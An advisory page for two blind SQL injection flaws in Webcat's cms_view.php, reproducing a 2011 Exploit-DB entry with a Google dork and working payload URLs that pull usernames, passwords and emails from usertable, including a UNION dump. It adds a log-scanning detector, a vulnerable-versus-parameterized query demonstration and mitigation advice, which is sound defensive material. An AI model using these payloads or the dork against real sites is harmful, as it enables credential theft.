Vendor: Webcat
Author: w0rd
CVSS: 7.5 (HIGH)
Vulnerability Type: SQL Injection
CWE: 89
Product Name: Webcat
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux/Windows 7
Date: 2011

Webcat – Two Blind SQL Injection Vulnerabilities

Two blind SQL injection vulnerabilities exist in Webcat's cms_view.php: one in the 'web_id' parameter and one in the 'id' parameter. Both values reach a database query unsanitized, so an attacker can append SQL to them. For example, the request 'http://www.domain.com/sc_webcat/ecat/cms_view.php?lang=1&web_id=1021' returns the normal page, while 'http://www.domain.com/sc_webcat/ecat/cms_view.php?lang=1&web_id=1021 and ascii(substring((SELECT concat(user_name,0x3a,user_password,0x3a,email,0x0a) FROM usertable limit 0,1),1,1))>80' appends a condition whose truth changes the response; by varying that condition an attacker can read the user name, password and email columns of usertable one character at a time. The 'id' parameter is injectable in the same way (e.g. 'http://www.domain.com/sc_webcat/ecat/cms_view.php?lang=1&id=50'). On at least one installation the 'web_id' injection was not blind, and a UNION query such as 'https://www.domain.com/sc_webcat/ecat/cms_view.php?lang=1&web_id=-1 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,group_concat(email,0x3a,user_password,0x0a),15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90 from usertable--' returned the contents of the user table directly in the page.
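The three request shapes above (a trailing quote, an appended boolean condition, a UNION SELECT) are easy to pick out of a web server access log, because the affected parameters should only ever carry a bare integer. The following is an added example, not part of the advisory and not Webcat's code: a small Python scanner that parses Apache-style log lines, URL-decodes the query string of requests to cms_view.php, and flags any 'web_id' or 'id' value that is not a plain integer, classifying the reason. The log lines, client addresses and timestamps are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache-style access log lines for a Webcat install (IPs, host and
# timestamps are made up). Lines 1-2 are ordinary requests; lines 3-5 carry the
# three request shapes from the advisory: a trailing quote, an appended boolean
# condition, and a UNION SELECT, URL-encoded as a browser or tool would send them.
SAMPLE_LOG = """\
203.0.113.5 - - [23/Jun/2011:10:01:02 +0000] "GET /sc_webcat/ecat/cms_view.php?lang=1&web_id=1021 HTTP/1.1" 200 5120
203.0.113.5 - - [23/Jun/2011:10:01:03 +0000] "GET /sc_webcat/ecat/cms_view.php?lang=1&id=50 HTTP/1.1" 200 4870
198.51.100.7 - - [23/Jun/2011:10:02:11 +0000] "GET /sc_webcat/ecat/cms_view.php?lang=1&web_id=1021' HTTP/1.1" 200 210
198.51.100.7 - - [23/Jun/2011:10:02:12 +0000] "GET /sc_webcat/ecat/cms_view.php?lang=1&web_id=1021%20and%20ascii(substring((SELECT%20user_name%20FROM%20usertable%20limit%200,1),1,1))%3E80 HTTP/1.1" 200 5120
198.51.100.7 - - [23/Jun/2011:10:02:13 +0000] "GET /sc_webcat/ecat/cms_view.php?lang=1&web_id=-1%20union%20all%20select%201,2,3%20from%20usertable-- HTTP/1.1" 200 5300
"""

# Common log format: client, ident, user, [time], "METHOD target PROTO", ...
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*"'
)
WATCHED_PARAMS = ("web_id", "id")   # the parameters the advisory names


def classify(value):
    """Return why a parameter value is suspicious, or None if it is a plain integer."""
    if re.fullmatch(r"-?[0-9]+", value):
        return None
    if re.search(r"\bunion\b.*\bselect\b", value, re.I):
        return "union"
    if re.search(r"\b(and|or)\b", value, re.I):
        return "boolean"
    if "'" in value:
        return "quote"
    return "non-numeric"


def scan_access_log(lines):
    """Flag cms_view.php requests whose web_id/id value is not a bare integer."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        if not url.path.endswith("/cms_view.php"):
            continue
        # parse_qs percent-decodes, so the SQL keywords become visible even
        # when the request was sent URL-encoded.
        params = parse_qs(url.query, keep_blank_values=True)
        for name in WATCHED_PARAMS:
            for value in params.get(name, []):
                reason = classify(value)
                if reason:
                    hits.append({"line": n, "client": m.group("client"),
                                 "param": name, "reason": reason, "value": value})
    return hits


if __name__ == "__main__":
    for h in scan_access_log(SAMPLE_LOG.splitlines()):
        print(f"line {h['line']}: {h['client']} {h['param']}={h['value']!r} -> {h['reason']}")
```

Because the check is "not a bare integer" rather than a list of attack strings, it also catches encodings and variants the three sample requests do not use; the keyword classification is only there to tell an analyst which shape of attempt they are looking at.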

Mitigation:

Input validation should be used to reject values that are not of the expected type, and the application should use parameterized queries so that request data is never concatenated into SQL statements.
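To make the two mitigations concrete, here is an added example, not Webcat's code: Webcat is written in PHP, but the defect and the fix look the same in any language, so the page-loading query is shown in Python with the standard library's sqlite3 module. The vulnerable handler builds the WHERE clause by string concatenation, exactly the pattern that lets an appended condition decide whether a row comes back; the hardened handler first validates that 'lang' and 'web_id' are decimal integers and then binds them as query parameters. The 'pages' table, its rows and the usertable row are constructed stand-ins (only the usertable column names come from the advisory).

```python
import re
import sqlite3

# Constructed stand-in for Webcat's database. Table/column names for usertable
# (user_name, user_password, email) come from the advisory; the 'pages' table
# and all rows are made up for this example.
def make_db():
    """Build an in-memory database with constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE pages (web_id INTEGER, lang INTEGER, title TEXT);
        CREATE TABLE usertable (user_name TEXT, user_password TEXT, email TEXT);
        INSERT INTO pages VALUES (1021, 1, 'Catalogue page 1021');
        INSERT INTO usertable VALUES ('admin', 'hash-placeholder', 'admin@example.invalid');
    """)
    return conn


def view_page_vulnerable(conn, lang, web_id):
    """The pattern the advisory describes: request values spliced into SQL text.
    Whatever follows the number in web_id becomes part of the WHERE clause, so
    an attacker-chosen condition decides whether a row is returned (blind injection)."""
    sql = "SELECT title FROM pages WHERE lang=" + lang + " AND web_id=" + web_id
    return conn.execute(sql).fetchall()


def to_id(value, name):
    """Input validation: identifiers must be plain decimal integers, nothing else."""
    if not re.fullmatch(r"[0-9]{1,10}", value):
        raise ValueError(f"{name} must be a positive integer")
    return int(value)


def view_page_hardened(conn, lang, web_id):
    """Validated, then bound as parameters: the driver sends the values separately
    from the statement text, so SQL syntax inside the input is never interpreted."""
    sql = "SELECT title FROM pages WHERE lang=? AND web_id=?"
    args = (to_id(lang, "lang"), to_id(web_id, "web_id"))
    return conn.execute(sql, args).fetchall()


def rejects(conn, lang, web_id):
    """True if the hardened handler refuses the given input."""
    try:
        view_page_hardened(conn, lang, web_id)
        return False
    except ValueError:
        return True


if __name__ == "__main__":
    db = make_db()
    # Normal request: both handlers return the page.
    print(view_page_vulnerable(db, "1", "1021"))
    print(view_page_hardened(db, "1", "1021"))
    # Appended condition (constructed, deliberately false): the vulnerable handler
    # evaluates it and the result set changes, which is the signal a blind
    # attack measures one character at a time.
    print(view_page_vulnerable(db, "1", "1021 and 1=0"))
    # The hardened handler never lets the same input reach the database.
    print(rejects(db, "1", "1021 and 1=0"))
```

Note that validation alone would stop this particular request, and parameterization alone would stop it too; using both is the point, because validation rules are easy to get wrong for free-text fields and parameterization does nothing about a value that is syntactically valid but semantically out of range.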
Source

Exploit-DB raw data:

# Exploit Title: Webcat - Two Blind SQL Injection Vulnerabilities
# Google Dork: allinurl: sc_webcat/ecat/cms_view.php
# Date: 6/23/2011
# Author: w0rd (w0rd[at]NULL0x00.com)
# Software Link: http://webcat.sourceforge.net/
# Tested on: [Linux/Windows 7]
# Vulnerable Parameters: web_id=, id=
##############################################################
PoC:

http://www.domain.com/sc_webcat/ecat/cms_view.php?lang=1&id=50'
http://www.domain.com/sc_webcat/ecat/cms_view.php?lang=1&web_id=1021'
http://www.domain.com/sc_webcat/ecat/cms_view.php?lang=1&web_id=1021 and ascii(substring((SELECT concat(user_name,0x3a,user_password,0x3a,email,0x0a) FROM usertable limit 0,1),1,1))>80

I have come across one site where it was not blind, and used this:
https://www.domain.com/sc_webcat/ecat/cms_view.php?lang=1&web_id=-1 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,group_concat(email,0x3a,user_password,0x0a),15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90 from usertable--

##############################################################
# Shouts to the Belegit crew